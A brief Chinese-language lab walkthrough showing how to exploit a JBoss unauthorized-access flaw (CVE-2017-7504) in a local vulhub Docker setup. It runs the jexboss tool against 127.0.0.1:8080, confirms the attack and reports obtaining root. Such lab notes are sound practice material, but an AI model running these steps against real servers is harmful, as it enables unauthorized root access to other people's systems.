JBOSS未授权访问漏洞利用

• vulhub下载

https://github.com/vulhub/vulhub.git

• docker下部署过程

  • 复制到linux环境

  • 进入环境： /home/kali/vulhub/jboss/CVE-2017-7504

  • docker-compose up -d启动

  • 访问127.0.0.1::8080 ,点击JMX Console

• 利用过程：

  • 下载工具

    https://github.com/joaomatosf/jexboss

  • cd jexboss

  • 执行命令

    python3 jexboss.py -u 127.0.0.1:8080

    返回vulnerable说明漏洞存在

    

  • 输入yes确认攻击

    

  • 利用成功，直接就是root权限

    

  •